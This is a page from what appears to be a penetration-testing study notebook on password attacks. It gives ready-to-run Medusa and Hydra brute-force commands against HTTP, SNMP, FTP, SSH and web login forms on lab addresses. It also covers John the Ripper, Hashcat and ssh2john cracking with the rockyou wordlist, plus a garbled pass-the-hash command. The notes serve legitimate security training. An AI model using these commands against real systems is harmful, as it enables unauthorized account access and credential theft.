On Cyber War
TwitterGitHubLinkedIn
  • Welcome
  • Source Zero Con References
  • 1. Reconnaissance/ OSINT
    • Information gathering
    • OSINT tools
    • Search Engine OSINT
    • Sock puppets
  • 2. Scanning
    • Host discovery
    • Port Scanning with Nmap
    • Nmap Scripting Engine
  • 3. Enumeration
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 80/443 - HTTP(s)
    • 111 - NFS
    • 135 - RPC
    • 139/445 - NetBIOS/SMB
    • 161 (UDP) - SNMP
    • Wordpress
    • Finger (Solaris)
    • Active Directory
  • 4. Exploitation
    • Public exploits
    • Web application attacks
      • Command injection
      • Cross site scripting
      • Directory traversal
      • File inclusion
      • SQL injection
    • Password attacks
    • Buffer overflows
    • Active Directory
    • Metasploit
  • 5. Maintaining access
    • Upgrading simple shells
    • Reverse shells
    • MSFvenom
    • File transfers
    • Linux privilege escalation
    • Windows privilege escalation
    • Tunneling/Port Forwarding
  • 6. Miscellaneous
    • Connections
  • 7. Walkthroughs
    • HTB - Blunder
    • HTB - Haircut
    • THM -HackPark
Powered by GitBook
On this page
  • Medusa
  • Hydra
  • John the Ripper
  • Hashcat
  • Passing the hash (Windows)
  1. 4. Exploitation

Password attacks

usr/share/wordlists

Medusa

Brute force basic http authorizations.

medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10

Hydra

Can be used to brute force numerous services.

hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin

** Brute force http-post login forms

Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>"

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"

John the Ripper

john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt

SSH keys

To crack SSH key passwords convert the key to a hash, then crack using John.

python ssh2john.py id_rsa > id_rsa.hash

Hashcat

hashcat -m (mode) -a 0 hash.txt Pass.txt

Passing the hash (Windows)

Create environment variable SMBHASH, containing hash we want to pass

export SMBHASH=hashvalue

Use pth-winexe to authenticate: pth-winexe -U administrator% //10.11.0.1.76.cmd

PreviousSQL injectionNextBuffer overflows

Last updated 2 years ago

Check for mode on wiki page

https://hashcat.net/wiki/doku.php?id=example_hashes